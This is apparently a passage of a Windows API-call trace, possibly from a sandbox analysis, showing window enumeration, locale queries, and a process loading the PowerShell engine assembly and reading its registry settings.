	[0820.873] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1290
	[0820.873] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1218
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1214
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x11ec
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x11e8
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x11cc
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1140
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe6c
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x6e8
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc6c
	[0820.874] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf94
	[0820.875] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xffc
	[0820.875] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf74
	[0820.875] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf08
	[0820.875] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf0c
	[0820.875] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xed8
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xe90
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xea8
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfa8
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfbc
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfb8
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfb4
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfb0
	[0820.876] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfac
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfc0
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xfd0
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf88
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf84
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xf80
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xde0
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xddc
	[0820.877] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xdd8
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd34
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd10
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xd0c
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc9c
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc74
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc1c
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xc08
	[0820.878] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xabc
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x24c
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xbb0
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xbfc
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb10
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x374
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x368
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb28
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xae8
	[0820.879] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb14
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x95c
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa8c
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x46c
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb3c
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa90
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xad0
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa9c
	[0820.880] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xaa0
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb1c
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x7e0
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa74
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x694
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xa28
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x9b0
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x8d8
	[0820.881] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x940
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x93c
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x4ec
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x150
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x720
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x3c4
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x7d4
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x6c8
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb54
	[0820.882] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb54
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x6bc
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0xb5c
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x838
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x818
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x5b8
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x494
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x1ec
	[0820.883] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x440
	[0820.884] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x7e8
	[0820.884] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x730
	[0820.884] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x2c8
	[0820.884] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x31c
	[0820.884] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x18db80 | out: lpdwProcessId=0x18db80) returned 0x330
	[0828.463] WerSetFlags () returned 0x0
	[0828.470] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0828.470] CoTaskMemFree (pv=0x0) 
	[0828.471] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18dee8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18dee0 | out: pulNumLanguages=0x18dee8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18dee0) returned 1
	[0828.472] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18dee8, pwszLanguagesBuffer=0x2c51a98, pcchLanguagesBuffer=0x18dee0 | out: pulNumLanguages=0x18dee8, pwszLanguagesBuffer=0x2c51a98, pcchLanguagesBuffer=0x18dee0) returned 1
	[0828.477] CoTaskMemAlloc (cb=0x24) returned 0x2bdc60
	[0828.477] GetUserDefaultLocaleName (in: lpLocaleName=0x2bdc60, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0828.477] CoTaskMemFree (pv=0x2bdc60) 
	[0833.785] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0833.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0833.785] CoTaskMemFree (pv=0x20ea10) 
	[0835.964] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0835.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0835.964] CoTaskMemFree (pv=0x20ea10) 
	[0835.966] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0835.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0835.966] CoTaskMemFree (pv=0x20ea10) 
	[0835.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0835.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0835.980] SetErrorMode (uMode=0x1) returned 0x1
	[0835.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18db60 | out: lpFileInformation=0x18db60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0835.980] SetErrorMode (uMode=0x1) returned 0x1
	[0835.980] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18ddd0 | out: lpdwHandle=0x18ddd0) returned 0x94c
	[0835.982] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c55328 | out: lpData=0x2c55328) returned 1
	[0835.983] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dd48, puLen=0x18dd40 | out: lplpBuffer=0x18dd48*=0x2c553c4, puLen=0x18dd40) returned 1
	[0835.983] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c554a0, puLen=0x18dcb0) returned 1
	[0835.983] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0835.983] CoTaskMemAlloc (cb=0x2e) returned 0x287880
	[0835.983] lstrcpyW (in: lpString1=0x287880, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0835.983] CoTaskMemFree (pv=0x287880) 
	[0835.983] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c554f4, puLen=0x18dcb0) returned 1
	[0835.983] lstrlenW (lpString="System.Management.Automation") returned 28
	[0835.983] CoTaskMemAlloc (cb=0x3c) returned 0x235d50
	[0835.983] lstrcpyW (in: lpString1=0x235d50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0835.983] CoTaskMemFree (pv=0x235d50) 
	[0835.983] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c55550, puLen=0x18dcb0) returned 1
	[0835.983] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0835.983] CoTaskMemAlloc (cb=0x20) returned 0x2bdcc0
	[0835.984] lstrcpyW (in: lpString1=0x2bdcc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0835.984] CoTaskMemFree (pv=0x2bdcc0) 
	[0835.984] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c55590, puLen=0x18dcb0) returned 1
	[0835.984] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0835.984] CoTaskMemAlloc (cb=0x44) returned 0x235d50
	[0835.984] lstrcpyW (in: lpString1=0x235d50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0835.984] CoTaskMemFree (pv=0x235d50) 
	[0835.984] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c555f8, puLen=0x18dcb0) returned 1
	[0835.984] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0835.984] CoTaskMemAlloc (cb=0x76) returned 0x25ef30
	[0835.984] lstrcpyW (in: lpString1=0x25ef30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0835.984] CoTaskMemFree (pv=0x25ef30) 
	[0835.984] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c55694, puLen=0x18dcb0) returned 1
	[0835.984] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0835.984] CoTaskMemAlloc (cb=0x44) returned 0x235d50
	[0835.984] lstrcpyW (in: lpString1=0x235d50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0835.984] CoTaskMemFree (pv=0x235d50) 
	[0835.984] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c556f8, puLen=0x18dcb0) returned 1
	[0835.984] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0835.985] CoTaskMemAlloc (cb=0x58) returned 0x218ee0
	[0835.985] lstrcpyW (in: lpString1=0x218ee0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0835.985] CoTaskMemFree (pv=0x218ee0) 
	[0835.985] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c55774, puLen=0x18dcb0) returned 1
	[0835.985] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0835.985] CoTaskMemAlloc (cb=0x20) returned 0x2bdcc0
	[0835.985] lstrcpyW (in: lpString1=0x2bdcc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0835.985] CoTaskMemFree (pv=0x2bdcc0) 
	[0835.985] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x2c5541c, puLen=0x18dcb0) returned 1
	[0835.985] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0835.985] CoTaskMemAlloc (cb=0x66) returned 0x2b37f0
	[0835.985] lstrcpyW (in: lpString1=0x2b37f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0835.985] CoTaskMemFree (pv=0x2b37f0) 
	[0835.985] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x0, puLen=0x18dcb0) returned 0
	[0835.985] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x0, puLen=0x18dcb0) returned 0
	[0835.985] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18dcb8, puLen=0x18dcb0 | out: lplpBuffer=0x18dcb8*=0x0, puLen=0x18dcb0) returned 0
	[0835.985] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dc88, puLen=0x18dc80 | out: lplpBuffer=0x18dc88*=0x2c553c4, puLen=0x18dc80) returned 1
	[0835.985] CoTaskMemAlloc (cb=0x204) returned 0x2674c0
	[0835.985] VerLanguageNameW (in: wLang=0x0, szLang=0x2674c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0835.986] CoTaskMemFree (pv=0x2674c0) 
	[0835.986] VerQueryValueW (in: pBlock=0x2c55328, lpSubBlock="\\", lplpBuffer=0x18dcd8, puLen=0x18dcd0 | out: lplpBuffer=0x18dcd8*=0x2c55350, puLen=0x18dcd0) returned 1
	[0835.994] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0835.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0835.995] CoTaskMemFree (pv=0x20ea10) 
	[0838.042] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0838.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0838.042] CoTaskMemFree (pv=0x20ea10) 
	[0839.882] lstrlenW (lpString="䅁") returned 1
	[0839.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dba8 | out: phkResult=0x18dba8*=0x2e8) returned 0x0
	[0839.894] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db98 | out: phkResult=0x18db98*=0x2ec) returned 0x0
	[0839.894] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dc28 | out: phkResult=0x18dc28*=0x2f0) returned 0x0
	[0839.899] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18db6c, lpData=0x0, lpcbData=0x18db68*=0x0 | out: lpType=0x18db6c*=0x1, lpData=0x0, lpcbData=0x18db68*=0x56) returned 0x0
	[0839.900] CoTaskMemAlloc (cb=0x5a) returned 0x2b3780
	[0839.900] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18db3c, lpData=0x2b3780, lpcbData=0x18db38*=0x56 | out: lpType=0x18db3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18db38*=0x56) returned 0x0
	[0839.900] CoTaskMemFree (pv=0x2b3780) 
	[0839.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0841.443] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0841.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.443] CoTaskMemFree (pv=0x20ea10) 
	[0860.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0860.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0864.404] CoTaskMemAlloc (cb=0x104) returned 0x251580
	[0864.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251580, nSize=0x80 | out: lpBuffer="") returned 0x0
